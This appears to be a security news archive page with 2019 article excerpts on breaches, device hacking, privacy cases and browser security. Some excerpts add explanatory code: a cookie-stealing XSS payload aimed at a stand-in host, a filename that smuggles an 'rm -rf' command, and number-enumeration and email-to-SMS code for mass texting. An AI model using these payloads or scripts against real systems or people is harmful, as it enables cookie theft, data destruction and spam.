UK-based Monzo bank, started in 2015 through a crowdfunding campaign, serves its customers with an iOS and Android app, along with a debit card that is still usable at ATMs. Unfortunately, its sophisticated software-driven business model let it down last week. On Sunday, it admitted that it hadn’t been as careful as it could have been with the PINs that customers use to access their account.

Engineers had access to customers’ PINs

The bank explained that it stored these PINs in a secure part of its infrastructure. Unfortunately that wasn’t the only place where it was storing them. An oversight meant that it had also been storing the PINs in the log files that its software engineers use to understand what’s happening in its systems.

Although the log files were encrypted, they were still insecure. The company explained:

Engineers at Monzo have access to these log files as part of their job.

Up to 100 engineers had the right to access those log files, meaning that one bad apple could have stolen them and used them to commit fraud.
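Monzo hasn’t published details of its logging stack, but the general defence against this class of slip-up is to scrub sensitive fields before they ever reach a log file. Here’s a minimal Python sketch of the idea (the field name and log format are assumptions for illustration):

```python
import logging
import re

class RedactPINFilter(logging.Filter):
    """Mask anything that looks like a card PIN before it is written out."""
    # Matches e.g. 'pin=1234', 'pin: 123456' (field name is an assumption)
    PIN_PATTERN = re.compile(r'\b(pin["\s:=]+)(\d{4,6})\b', re.IGNORECASE)

    def filter(self, record):
        record.msg = self.PIN_PATTERN.sub(r'\1****', str(record.msg))
        return True  # keep the record, just with the digits masked

logger = logging.getLogger("payments")
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
logger.addHandler(handler)
logger.addFilter(RedactPINFilter())

# The stored line reads 'pin=****' instead of the real digits
logger.warning("card activation failed, pin=1234, retrying")
```

A filter like this only helps with logs written after it’s deployed, of course – the PINs already sitting in old log files still have to be purged, which is what Monzo said it did.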


August 12, 2019 »

Hacking 4G hotspots – when did you last update?

By Paul Ducklin

Well-known device hacking researchers at cybersecurity company Pen Test Partners have just published an article summarizing the 4G hotspot hacking research they presented at last week’s DEF CON event.

Simply put, a 4G hotspot is a miniaturized, battery-powered, SIM-card-equipped equivalent to your home router.

Home routers typically plug into a mains adapter for power, plug into your phone line or a cable connection for internet connectivity, and accept Wi-Fi or wired network links from your laptops, desktops, smart TVs and so on.

In contrast, 4G hotspots are typically pocket-sized devices, often shaped like a small soap bar, that don’t plug into anything except to charge up their internal battery, usually via a 5V USB port.

Most mobile phones, in fact, include a hotspot feature so that you can share the phone’s 4G connection via the Wi-Fi card in the phone, but self-contained hotspots are still popular, not least because they make it easy to keep your voice and data charges separate.

Indeed, many mobile phone providers offer special deals with a hotspot device and a pre-paid data SIM for home users who can’t or don’t want to get a phone line or cable hookup at home.


Apple will hand out unlocked iPhones to vetted researchers

By Lisa Vaas

It’s been called an iPhone jailbreaker’s golden egg: a so-called “dev-fused” iPhone created for internal use at Apple in order to extract and study the Secure Enclave Processor (SEP).

That golden yolk of a processor handles data encryption on the device that oh so many law enforcement and hacker types spend so much time, respectively, complaining about or cracking for fun, fame and profit.

Those rare, developer-only, “pre-jailbroken” iPhones have many security features disabled – a convenient feature for researchers looking to see how they tick and to discover iPhone zero days, which can be worth millions of dollars.

Well, here’s some good news for a select group of researchers: at the Black Hat 2019 security conference on Thursday, Apple’s head of security, Ivan Krstic, unveiled a new program through which the company is offering some form of pre-dev iPhones, specifically for security researchers.

CNet quoted Krstic:

This is an unprecedented, fully Apple-supported iOS security research platform.

As CNet reports, Apple is calling it the iOS Security Research Device Program. The program will launch next year.

Apple is only handing out a limited number of the iPhones, and only to qualified researchers.

These are not exactly like the phones that Apple gives its own security researchers. They’re going to come with what Krstic said are advanced debugging capabilities, but they won’t be as wide open as the jailbroken phones that Apple insiders use – or that sometimes wind up on the black market as iPhones that either haven’t completed the production process or have been reverted to a development state.

Krstic said that the iPhones, while not being that open, will still provide ample details that can be used to hunt for vulnerabilities.


Facebook facial recognition: class action suit gets court’s go ahead

By Lisa Vaas

Yes, yet another US court has reaffirmed: Facebook users can indeed sue the company over its use of facial recognition technology.

The US Court of Appeals for the Ninth Circuit on Thursday affirmed the district court’s certification of a class action suit – Patel v. Facebook – that a steady progression of courts has allowed to proceed since it was first filed in 2015.

Though a stream of courts has refused to let Facebook wiggle out of this lawsuit – and boy oh boy, has it tried – this is the first decision of an American appellate court that directly addresses what the American Civil Liberties Union (ACLU) calls the “unique privacy harms” of facial recognition technology, which is ever more ubiquitous and increasingly being foisted on the public without our knowledge or consent.

The lawsuit was initially filed by some Illinois residents under Illinois law, but the parties agreed to transfer the case to the California court.

What the suit claims: Facebook violated Illinois privacy laws by “secretly” amassing users’ biometric data without getting consent from the plaintiffs, Nimesh Patel, Adam Pezen and Carlo Licata, collecting it and squirreling it away in what Facebook claims is the largest privately held database of facial recognition data in the world.


GDPR privacy can be defeated using right of access requests

By John E Dunn

A British researcher has uncovered an ironic security hole in the EU’s General Data Protection Regulation (GDPR) – right of access requests.

Right of access, also called subject access, is the part of the GDPR that allows individuals to ask organisations for a copy of any data held on them.

This makes sense because, as with any user privacy system, there must be a legally enforceable mechanism which allows people to check the accuracy and quantity of personal data.

Unfortunately, in what can charitably be described as a massive GDPR teething problem, Oxford University PhD student James Pavur has discovered that too many companies are handing out personal data when asked, without checking who’s asking for it.

In his session entitled GDPArrrrr: Using Privacy Laws to Steal Identities at this week’s Black Hat show, Pavur documents how he decided to see how easy it would be to use right of access requests to ‘steal’ the personal data of his fiancée (with her permission).

After he contacted 150 UK and US organisations posing as her, the answer was: not hard at all.

According to the accounts by journalists who attended the session, for the first 75 contacted by letter, he impersonated her by providing only information he was able to find online – full name, email address, phone numbers – which some companies responded to by supplying her home address.


Blackmailed for Bitcoin – exchange rebuffs $3.5m ransom demand

By Paul Ducklin

Cryptocurrencies are a big deal once again, now that Bitcoin is back over $10,000.

You might think that’s good news for cryptocurrency exchanges, which are businesses that let you trade regular money, such as Euros, Dollars and Pounds, into and out of so-called virtual currencies like Bitcoin, Monero and Dogecoin.

But it’s not all plain sailing – cryptocurrency companies are of particular interest to cybercrooks, and not only for the cryptocoins they hold.

Here’s a story of super-sized digital blackmail aimed at one of the biggest exchanges out there.


As you probably know, businesses are supposed to make an effort to know their customers (and their suppliers) these days, as a way of making money laundering more difficult.

And know-your-customer (KYC) rules are particularly important for banks and other businesses, including cryptocoin exchanges, that let people put in money at one end, shuffle it around a bit, or even a lot, and later extract it at the other.

The problem with KYC rules is that they force companies to collect and keep personal data that both you and they would much rather not send across the internet – for example, bills that prove your address, bank statements that vouch for the source of your money, scans of your passport to confirm your identity, and more.


Instagram boots ad partner for location tracking and scraping stories

By Lisa Vaas

A “preferred Facebook Marketing Partner” has secretly tracked millions of Instagram users’ locations and stories, Business Insider reported on Wednesday.

Facebook has confirmed that San Francisco-based marketing firm HYP3R scraped huge quantities of data from Instagram in order to build detailed user profiles – profiles that included users’ physical whereabouts, their bios, their interests, and the photos that were supposed to vanish after 24 hours.

It was all done in “clear violation of Instagram’s rules,” BI reports, and Facebook has subsequently kicked HYP3R to the curb. BI reports that after the publication presented its findings on Wednesday, Instagram issued HYP3R a cease-and-desist letter, booted it off the platform, and tweaked the platform to protect user data.

Here’s the statement that Facebook is sending to media outlets:

HYP3R’s actions were not sanctioned and violate our policies. As a result, we’ve removed them from our platform. We’ve also made a product change that should help prevent other companies from scraping public location pages in this way.

Instagram’s failure to protect location data is a “mystery”

We don’t know exactly how much data HYP3R got at. But as BI notes, the company has publicly bragged about having “a unique dataset of hundreds of millions of the highest value consumers in the world that gives an edge to the leaders in travel and retail.”

According to the publication’s sources, HYP3R sucks in more than 1 million Instagram posts per month, and more than 90% of the data it brags about comes from the platform.

Data scraping is a pervasive problem online, as BI points out. We’ve seen multiple lawsuits, naming big players, brought over the practice. In 2017, for example, a lawsuit was brought against Uber over one of its units – Marketplace Analytics – that allegedly spied on competitors worldwide for years, scraping millions of their records using automated collection systems.


August 6, 2019 »

Google and Apple suspend contractor access to voice recordings

By John E Dunn

Apple and Google have announced that they will limit the way audio recorded by their voice assistants, Siri and Google Assistant, is accessed internally by contractors.

Let’s start with Apple.

Apple’s privacy hump began a week ago when The Guardian ran a story revealing that contractors “regularly hear” all sorts of things Apple customers would probably rather they didn’t, including sexual encounters, business deals, and patient-doctor chats.

Despite Apple’s protestations that such recordings are pseudonymised and only accessed to improve Siri’s accuracy, the whistleblower who spoke to the newspaper was adamant that in some cases:

These recordings are accompanied by user data showing location, contact details, and app data.

Apple now says it has suspended the global program under which voice recordings were being accessed in this way while it conducts a review.

It’s not clear how long this will remain in force, nor whether the company will adjust the time period it keeps recordings on its servers (currently between six months and two years).

By interesting coincidence, Google finds itself in a similar fix. Germany’s privacy regulator recently started asking questions after Belgian broadcaster VRT ran a story last month on contractors listening to Google Assistant recordings. Google’s privacy fig leaf:

We don’t associate audio clips with user accounts during the review process, and only perform reviews for around 0.2% of all clips.

Nevertheless, Google now says it has also suspended access to recordings in the EU for three months.

It was Amazon which started this ball rolling in April, when a Bloomberg report revealed that – yes – recordings stored by its Alexa voice assistant were being accessed by contractors.


Hackers exploit SMS gateways to text millions of US numbers

By John E Dunn

Receive any strange SMS text messages recently?

If you live in the US, there’s a small chance you might have received an SMS with the following text in the last few days from someone called ‘j3ws3r on Twitter’:

I’m here to warn the masses about SMS email gateways. Please look up how to disable it on your phone or call your provider and ask.

Judging from responses on Twitter, the chances of receiving one of these are currently low, although it’s also possible some phone users either ignored the message or deleted it out of habit.

(The text also begins with a promotional link to controversial YouTuber PewDiePie, a clue to its origins which we’ll get to shortly.)

Of the few recipients who took to Twitter to ask about the message, most seem concerned about how the senders got hold of their mobile number.

In fact, they didn’t have to, because according to Wired the whole campaign was run from a script that generates every possible seven-digit subscriber number between 1111111 and 9999999 and bolts each one onto a list of every US area code.
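The script itself wasn’t published, so the following Python sketch is purely an illustration of the enumeration Wired describes, with a couple of real area codes standing in for the full list:

```python
# Illustration only: enumerate every 7-digit subscriber number for each
# area code, as Wired describes. This is not the attacker's actual script.
def enumerate_numbers(area_codes):
    for area in area_codes:
        for subscriber in range(1111111, 10000000):  # 1111111..9999999 inclusive
            yield f"{area}{subscriber:07d}"

# A couple of real US area codes, just to show the shape of the output
sample = enumerate_numbers(["212", "415"])
print(next(sample))  # 2121111111
```

With roughly 300 active US area codes, that’s on the order of 2.7 billion candidate numbers – which is why the senders didn’t need anyone’s number in advance.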

How were the texts sent?

It seems that a single Unix command was used to send the messages to the email-to-SMS gateways used by all 26 major US carriers, which in theory will have forwarded them to legitimate numbers.
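The command itself wasn’t published, but email-to-SMS gateways are simple to drive: each carrier accepts mail at an address built from the phone number plus a carrier-specific domain, and forwards the body as a text. A hedged Python sketch (the gateway domain, sender address and SMTP relay here are assumptions – check your carrier’s documentation):

```python
import smtplib
from email.message import EmailMessage

def build_sms_email(number, gateway_domain, body):
    """Build the email that a carrier's email-to-SMS gateway forwards as a text.

    The gateway domain varies per carrier (T-Mobile's, for example, is
    tmomail.net); consult your carrier's documentation for the right one.
    """
    msg = EmailMessage()
    msg["To"] = f"{number}@{gateway_domain}"
    msg["From"] = "alerts@example.com"  # placeholder sender
    msg.set_content(body)
    return msg

def send_sms(msg, smtp_host="localhost"):
    # Hands the message to whatever SMTP relay you have access to
    with smtplib.SMTP(smtp_host) as server:
        server.send_message(msg)

msg = build_sms_email("2125551234", "tmomail.net", "Test message")
print(msg["To"])  # 2125551234@tmomail.net
```

Combine this with a number-enumerating loop and you have, in essence, the whole campaign – which is exactly the point ‘j3ws3r’ was making.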


FileZilla fixes show how far we’ve come since Heartbleed

By Mark Stockley

Users of FileZilla, the popular open source FTP client, may have noticed a rather serious looking bug described in the change log for the latest update:

Filenames containing double-quotation marks were not escaped correctly when selected for opening/editing. Depending on the associated program, parts of the filename could be interpreted as commands.

Fixed in version 3.43.0, the flaw is one of seven separate security bugs whose discovery is credited to a bug bounty program run by the European Union, of all things.
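FileZilla is written in C++ and its actual fix isn’t shown here, but the underlying bug class – building a command line by pasting a filename into a string, so that quote characters in the name break out into the command – is easy to reproduce in miniature:

```python
import shlex

# An attacker-chosen filename that tries to smuggle in extra commands
filename = 'report".txt; rm -rf ~; "'

# Dangerous: naive interpolation lets the embedded quotes break out,
# so a shell would see extra commands after the filename
unsafe_command = f'open "{filename}"'

# Safer: shlex.quote escapes the name so the shell sees a single argument
safe_command = f'open {shlex.quote(filename)}'

# Round-tripping through the shell's own parsing rules shows the fix:
# the entire hostile filename survives as one argument, nothing more
assert shlex.split(safe_command) == ["open", filename]
```

Safer still is to avoid the shell entirely and pass the filename as one entry in an argument list (e.g. via `subprocess.run`), so it is never parsed at all.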

The EU’s bureaucratic tentacles reach into many things, but a bit of freeware from an era when cover CDs were a thing still seems an odd place to find them.

Explaining why requires a brief trip down memory lane…

Eric S. Raymond’s seminal work on open source, The Cathedral and the Bazaar, taught us that “given enough eyeballs, all bugs are shallow”.

The idea being that the more people who are actively involved in developing, debugging and testing your code, the easier, faster and cheaper it is to find and fix bugs in it.

It’s an idea that’s central to the success, longevity and robustness of sprawling, noisy, open source projects like the Linux kernel. The development process for Linux, and the many other open source projects propping up our internet ecosystem, is entirely transparent, conducted before a potential audience of billions of eyeballs.


August 5, 2019 »

Space agency uses Raspberry Pi to solve satellite encryption puzzle

By John E Dunn

How does the European Space Agency (ESA) communicate securely with satellites and space missions?

Surprisingly, until relatively recently it often didn’t – something which is still true for smaller, cheaper satellites such as CubeSats.

Now ESA hopes that an experiment consisting of a small module built around a tiny Raspberry Pi Zero board controlled from a laptop on the ground will close this hypothetical security issue at very low cost.

It’s called the Cryptography ICE Cube (or CryptIC), measures only 10x10x10cm, and is the brainchild of a special ESA department called the International Commercial Experiments service, or ICE Cubes for short.

Currently installed on the Cygnus NG-11, launched in April 2019, the CryptIC box is a small unit shielded from the high radiation levels in space using a plastic coating.

However, while the coating protects the electronics from the worst of the radiation, it isn’t enough to stop interference with the microprocessors used to make encryption possible. ESA software product assurance engineer, Emmanuel Lesser, explains:

In orbit the problem has been that space radiation effects can compromise the key within computer memory causing ‘bit-flips’.

This is enough to disrupt communication as keys used on the ground and in space no longer match up.

The traditional solution to this is to use radiation-hardened equipment, but this is expensive.
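The underlying problem is easy to demonstrate: symmetric cryptography fails completely if even one bit of the shared key changes. ESA hasn’t published CryptIC’s algorithms, so this standard-library sketch uses an HMAC purely to illustrate the mismatch:

```python
import hmac
import hashlib

ground_key = bytes(range(32))       # 256-bit key held by the ground station
space_key = bytearray(ground_key)
space_key[0] ^= 0b00000001          # a single radiation-induced bit-flip

message = b"telemetry frame 42"
tag_ground = hmac.new(ground_key, message, hashlib.sha256).digest()
tag_space = hmac.new(bytes(space_key), message, hashlib.sha256).digest()

# One flipped bit out of 256 and the two sides can no longer agree
print(hmac.compare_digest(tag_ground, tag_space))  # False
```

Which is why CryptIC’s approach – cheap, replaceable hardware that can detect the corruption and re-synchronise keys – is interesting: it attacks the problem in software rather than with expensive radiation-hardened silicon.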


4 million Club Penguin Rewritten accounts exposed in breach

By John E Dunn

Last Friday, the hugely popular gaming site Club Penguin Rewritten (CPRewritten) suffered a data breach that exposed four million user accounts.

Having account data including email addresses, usernames, IP addresses and passwords stolen is bad enough in any event, but this was made much worse by the fact that it came on the back of a separate breach in January 2018, affecting 1.7 million accounts, which was only made public more than a year later.

The cause of the latest breach? According to someone connected to CPRewritten who contacted news site Bleeping Computer this week, the hack happened after hackers accessed a hidden PHP database back door put there by a former site admin last year.

It’s a version of events that both the individual concerned and the hacking group that’s claimed responsibility strenuously deny.

The New World Order group who claim credit for the breach say they compromised the site using a vulnerability in the Adminer database administration tool. Regarding the admin’s involvement, they tweeted this:

…he had nothing to do with it. CPR admins know who we are, we’re responsible for the database breaches of many other CPPSes.

July breach

CPRewritten launched in 2017 in order to continue the earlier Club Penguin (CP), which was shut by owners Disney in the same year.

A year later it was announced that CPRewritten, too, would be closing, a decision that was reversed a month later after extra funding was found.


Anime filter glitches, exposing face of one extremely smart vlogger

By Lisa Vaas

Full disclosure.

Before delving into the case of a Chinese vlogger whom the public was aghast to find out was older than her filters made her out to be, I should tell you that the photo on my bio for Naked Security isn’t real.*

This is how I look without filters.

Forgive the deception. It’s necessary for me to eat your species. I mean mate with. I mean, hey, look over there, is that a blimp?

As the BBC tells it, the vlogger in question calls herself “Your Highness Qiao Biluo”. The porcelain-skinned cutie-pie was quite popular before the porcelain cracked during an interview she was doing with another vlogger, the jaw-droppingly cute presumably-without-filters Qingzi, on the Chinese video-game live-streaming DouYu platform, which is similar to Twitch.

Qiao Biluo had nearly 130,000 followers on DouYu before a computer glitch removed the filter she was using to make herself look like an anime doll (and thus eminently worthy of cash donations).

You can see for yourself how Your Highness Qiao Biluo’s filters failed during the chat, since it was captured on YouTube. She’s the woman on the right.

According to the BBC, Chinese news outlet Lychee News reported that the filter failure happened on 25 July, during the joint live-stream.

According to Global News, up until the filter fail, the vlogger had covered her face with an anime sticker. The BBC has a picture of Qiao Biluo using a filter in previous videos to make herself look younger:

"China has more than 425 million live-streamers and the use of face filters is something that is common across the……

Resh (@thebooksatchel) August 01, 2019

Prior to the accidental reveal, fans had been sending in donations, even without seeing her face, but had also been begging Qiao Biluo to remove her filter so they could see the real McCoy.


Facebook is working on mind-reading

By Lisa Vaas

How does the prospect of Facebook learning how to read minds strike you?

Fellow social media-participating lab rats, you are likely already aware that Facebook has been crafted on the principles of Las Vegas-esque addiction, the idea being to exploit human psychology by giving us little hits of dopamine with those “Likes” in order to keep us coming back to the platform like slot machine addicts feeling favored by Lady Luck.

In 2017, ex-president of Facebook Sean Parker told us all about Facebook’s nonchalantly endeavoring to get us addicted, during that era’s spate of mea-culpa’ing.

This is all just to say that it might be reasonable to worry about Facebook playing around with our wetware. There are reasons, in other words, why somebody might not trust Facebook with direct access to their brain.

But one of Facebook’s technology research projects – the funding of artificial intelligence (AI) algorithms capable of turning brain activity into speech – may be altruistic.

It’s about creating a brain-computer interface (BCI) that allows people to type just by thinking, and Facebook has announced that it’s just achieved a first in the field: while previous decoding has been done offline, a team at the University of California San Francisco has, for the first time, managed to decode a small set of full, spoken words and phrases from brain activity in real time.

In an article published on Tuesday in Nature Communications, University of California San Francisco (UCSF) neurosurgeon Edward Chang and postdoctoral student David Moses published the results of a study demonstrating that brain activity recorded while people speak could be used to almost instantly decode what they were saying into text on a computer screen.

Chang also runs a leading brain mapping and speech neuroscience research team dedicated to developing new treatments for patients with neurological disorders. In short, he’s the logical choice for the BCI program, which Facebook announced at its F8 conference in 2017. The program’s goal is to build a non-invasive, wearable device that lets people type by simply imagining that they’re talking.


Researchers hack camera in fake video attack

By Danny Bradbury

Tampering with surveillance cameras is a common activity for Hollywood heroes and criminals alike. Now, researchers have shown how they can do it in real life.

Remember Speed, the 1994 movie where Keanu Reeves and Sandra Bullock had to keep a bus moving above a certain speed to stop Dennis Hopper blowing it up? Hopper’s character, Howard Payne, watches them with a hidden video camera. Any funny business, and he presses the button. To fool him, they persuade a local news crew to record the camera footage and then broadcast it in a loop, enabling everyone to escape while convincing Payne that they were still there.

Back then, cameras were analogue, but researchers at security company Forescout have demonstrated how to do the same thing with digital cameras over a network.

They conducted the project, which they described in a technical paper, to see how easy it would be to attack internet-connected smart building environments rather than save speeding buses. They set up a test network incorporating smart lighting, IP surveillance cameras, and an IoT device that connected energy consumption and space consumption sensors.

Technology may make things more functional, but it also makes them more hackable. Many IP cameras come with weak protocols such as Telnet and FTP enabled by default, they pointed out – even when their users don’t need them. This needlessly increases the attack surface of the devices. They also stream video using unencrypted real-time transport (RTP), along with the real-time streaming protocol (RTSP).

There are secure versions of RTP and RTSP, but Forescout’s report said that it rarely sees them used in real-world deployments. You could tunnel the RTSP stream through an encrypted protocol such as a Transport Layer Security (TLS) stream, but again, vendors typically don’t bother.
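Part of the reason sniffing and replacing footage is practical is that RTSP is a plain-text protocol. This sketch shows what a request to a (hypothetical) camera looks like on the wire – readable, and replaceable, by anyone on the path:

```python
# What an RTSP request looks like on the wire: plain, readable text.
# The camera hostname here is made up; DESCRIBE is a standard RTSP method.
request = (
    "DESCRIBE rtsp://camera.local/stream1 RTSP/1.0\r\n"
    "CSeq: 2\r\n"
    "User-Agent: demo-client\r\n"
    "\r\n"
).encode("ascii")

# In a real client these bytes go over a bare TCP socket (port 554 by
# default) with no handshake and no encryption, unless the deployment
# tunnels the stream inside TLS, which Forescout says is rare in practice.
print(request.decode("ascii").splitlines()[0])
```

An attacker who can see this traffic can also record the video payload that follows it, and later replay that payload in place of the live feed.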

Forescout’s team verified that they could gain access to the network by compromising an existing device. Given the reliance on default login credentials, this is all too common. Hackers can then use a compromised device to attack other devices on the network.


July 18, 2019 »

Google Chrome is ditching its XSS detection tool

By Danny Bradbury

Google is removing a nine-year-old feature in its Chrome web browser, which spotted a common online attack. Don’t worry, though – another, hopefully better, protection measure is on the way.

Introduced in 2010, XSS Auditor is a built-in Chrome function designed to detect cross-site scripting (XSS) vulnerabilities. In an XSS attack, a malicious actor injects their own code onto a legitimate website. They might do that by adding malicious code to a legitimate URL, or by posting content to a site that stores and displays what they’ve posted (persistent XSS).

When someone views the code injected by the attacker, it executes in their browser, where it might do anything from stealing the victim’s cookies to trying to infect them with a virus.

Websites should prevent this kind of attack by sanitizing user-submitted data, but many don’t.
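Sanitizing usually means escaping user-submitted data so the browser renders it as text rather than executing it. A minimal sketch using Python’s standard library (server-side frameworks in any language offer an equivalent):

```python
from html import escape

# A classic XSS payload submitted as a "comment" (the URL is made up)
user_input = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Echoed raw into the page, the browser would execute it:
unsafe_html = f"<p>{user_input}</p>"

# Escaped, the angle brackets and quotes become harmless entities,
# so the payload displays as text instead of running:
safe_html = f"<p>{escape(user_input)}</p>"
print(safe_html.startswith("<p>&lt;script&gt;"))  # True
```

Filters like XSS Auditor only tried to catch the cases where sites skipped this step; the fix belongs on the server, which is partly why browser-side filtering is being retired.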

XSS Auditor tries to detect XSS vulnerabilities while the browser is parsing HTML. It uses a blocklist to identify suspicious characters or HTML tags in request parameters, matching them with content to spot attackers injecting code into a page.

The beef that some developers have is that it doesn’t catch all XSS vulnerabilities in a site. Bypasses – XSS payloads that the feature fails to spot – are common online.

Google’s engineers had already adapted XSS Auditor to filter out troublesome XSS code rather than blocking access altogether, citing “undesirable consequences”, but this clearly wasn’t enough, and now they’re killing it off altogether.


Still not using HTTPS? Firefox is about to shame you

By Danny Bradbury

Two years after promising to report all HTTP-based web pages as insecure, Mozilla is about to deliver. Soon, whenever you visit one of the shrinking number of sites that doesn’t use a security certificate, the Firefox browser will warn you.

Firefox developer Johann Hofmann announced the news this week:

In desktop Firefox 70, we intend to show an icon in the “identity block” (the left hand side of the URL bar which is used to display security / privacy information) that marks all sites served over HTTP (as well as FTP and certificate errors) as insecure.

Firefox 70 will ship in October. The change is an attempt to crack down on sites that don’t secure their communications.

Insecure sites use the hypertext transfer protocol (HTTP), which sends data in clear text. HTTPS sites are more secure because they use Transport Layer Security (TLS), which establishes an encrypted link between the browser and the web server before any HTTP requests are sent.
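From the browser’s side, the crucial point is that certificate validation happens before any HTTP is exchanged. Python’s standard library defaults illustrate the checks a well-behaved client is expected to make:

```python
import ssl

# The browser's side of an HTTPS connection, in miniature: a TLS context
# that insists on certificate validation and hostname checking before a
# single HTTP byte is sent.
context = ssl.create_default_context()
print(context.verify_mode == ssl.CERT_REQUIRED)  # True: reject invalid certs
print(context.check_hostname)                    # True: cert must match the host

# To talk to a real site you'd wrap a TCP socket, e.g.:
#   with socket.create_connection(("example.com", 443)) as sock:
#       with context.wrap_socket(sock, server_hostname="example.com") as tls:
#           tls.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
```

A plain-HTTP site skips all of this, which is exactly why Firefox 70 will flag it in the identity block.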

Hofmann explained that this was part of a broader initiative to simplify the security user-interface in Firefox 70.

Firefox began showing the ‘insecure’ icon in January 2017 but limited it to HTTP pages that collected passwords with login forms. It said at the time that it would expand the initiative to cover all HTTP pages.


RDP exposed: the wolves already at your door

By Mark Stockley

For the last two months the infosec world has been waiting to see if and when criminals will successfully exploit CVE-2019-0708, the remote, wormable vulnerability in Microsoft’s RDP (Remote Desktop Protocol), better known as BlueKeep.

The expectation is that sooner or later a BlueKeep exploit will be used to power some self-replicating malware that spreads around the world (and through the networks it penetrates) in a flash, using vulnerable RDP servers.

In other words, everyone is expecting something spectacular, in the worst possible way.

But while companies race to ensure they’re patched, criminals around the world are already abusing RDP successfully every day, in a different, no less devastating but much less spectacular way.

Many of the millions of RDP servers connected to the internet are protected by no more than a username and password, and many of those passwords are bad enough to be guessed, with a little (sometimes very little) persistence.
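Whether a password is “bad enough to be guessed” is really just arithmetic. A back-of-envelope sketch – the guessing rate here is an assumption for illustration, not a measured figure:

```python
# Back-of-envelope: how long until an online guesser exhausts a keyspace?
GUESSES_PER_SECOND = 100  # assumed rate against one internet-facing RDP server

def seconds_to_exhaust(alphabet_size, length):
    """Worst-case time to try every password of the given shape."""
    return (alphabet_size ** length) / GUESSES_PER_SECOND

top_1000_list = 1000 / GUESSES_PER_SECOND    # a common-passwords wordlist
lowercase_6 = seconds_to_exhaust(26, 6)      # six lowercase letters
random_12 = seconds_to_exhaust(62, 12)       # twelve random alphanumerics

print(f"top-1000 wordlist: {top_1000_list:.0f} seconds")
print(f"6 lowercase letters: {lowercase_6 / 86400:.0f} days")
print(f"12 random alphanumerics: {random_12 / (86400 * 365):.2e} years")
```

The gap between the first two lines and the last is the whole story: the credential markets described below exist because so many servers sit at the “seconds to days” end of that scale.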

Correctly guess a password on one of those millions of computers and you’re in to somebody’s network.

It isn’t a new technique, and it sounds almost too simple to work, yet it’s popular enough to support criminal markets selling both stolen RDP credentials and compromised computers. The technique is so successful that the criminals crippling city administrations, hospitals, utilities and enterprises with targeted ransomware attacks, and demanding five- or six-figure ransoms, seem to like nothing more.


« older